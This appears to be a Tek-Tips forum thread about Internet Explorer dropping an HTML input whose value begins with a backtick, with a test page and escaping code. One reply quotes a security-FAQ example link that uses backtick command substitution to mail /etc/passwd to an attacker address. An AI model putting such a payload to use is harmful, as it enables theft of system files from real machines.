Tek-Tips is the largest IT community on the Internet today!

Backtick ` char causes undefined value

Status
Not open for further replies.

lihc

Programmer
Jun 24, 2005
1
US
The following code is an example of an error I have encountered with the backtick ` char. When the backtick is present in html and then assigned to a javascript object that portion of the html becomes undefined.

<html>
<head>
<title>JavaScript ` Backtick Error</title>
<script language="JavaScript">

function getBackTickData() {

  //this assignment is where the error occurs
  bd = backtickdata.innerHTML ;

  //output.innerHTML will not contain the "hasbacktick" input
  output.innerHTML = bd ;

  //this happens in IE but not Firefox
  alert( ' backtickdata.innerHTML = ' + backtickdata.innerHTML + '\n\n' +
         ' bd = backtickData.innerHTML ; ' + '\n\n' +
         ' output.innerHTML = bd ; ' + '\n\n' +
         ' output.innerHTML = ' + output.innerHTML ) ;

  return ;
}

</script>
</head>

<body onload="getBackTickData()" >

<div id="backtickdata" >
  <input type="hidden" name="nobacktick" value="nobacktick" />
  <input type="hidden" name="hasbacktick" value="`hasbacktick" />
</div>

<div id="output" >
</div>

</body>
</html>

The alert box will show both hidden inputs when it displays backtickdata.innerHTML but then will lose the second input after the assignment and only display the first when it displays output.innerHTML. The solution I have come up with is to use
bd = backtickdata.innerHTML.replace('`','&#96;') ;

Does anyone know why this happens?
( it happens in IE and not Firefox ).
 
Possibly a bug or possibly a security patch that prevents SQL injection attacks or hacks on UNIX/Linux like so:
Code:
<!-- Source: http://www.w3.org/Security/Faq/wwwsf2.html -->
<a href="LYNXDOWNLOAD://Method=-1/File=`mail%20hackers@hack.com%3C/etc/passwd`/SugFile=test">
CLICK HERE
</a>
Your guess is as good as mine. It works fine if the backtick is the second character instead of the first.

Adam
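
The workaround from the first post, carried further as an added example (not code from either poster): `replace()` with a string pattern stops after the first match, so a value holding two backticks would keep one raw. The function names and the third sample field are hypothetical, and the sketch assumes the field data is available as values, so the markup can be built with quoted, escaped attributes rather than re-read from innerHTML.

```javascript
// Added example: all names below are hypothetical, not from the thread.

// Character references for characters that can open or close an
// attribute value, including the backtick (&#96;) from the first post.
const ATTR_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#39;', '`': '&#96;'
};

// Encode every occurrence of each special character in one pass.
function escapeAttr(value) {
  return String(value).replace(/[&<>"'`]/g, function (ch) {
    return ATTR_ENTITIES[ch];
  });
}

// The thread's workaround as posted: string pattern, first match only.
function firstOnly(markup) {
  return markup.replace('`', '&#96;');
}

// Same idea with a global regex, so no raw backtick is left behind.
function encodeAllBackticks(markup) {
  return markup.replace(/`/g, '&#96;');
}

// Build the hidden inputs from data, always quoting and escaping values.
function renderHiddenInputs(fields) {
  return fields.map(function (f) {
    return '<input type="hidden" name="' + escapeAttr(f.name) +
           '" value="' + escapeAttr(f.value) + '" />';
  }).join('\n');
}

// Constructed sample: the thread's two inputs plus one with two backticks.
const SAMPLE_FIELDS = [
  { name: 'nobacktick', value: 'nobacktick' },
  { name: 'hasbacktick', value: '`hasbacktick' },
  { name: 'twoticks', value: '`a`b' }
];

console.log(renderHiddenInputs(SAMPLE_FIELDS));
console.log(firstOnly('value=`a`b'));           // one raw backtick remains
console.log(encodeAllBackticks('value=`a`b'));  // none remain
```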
 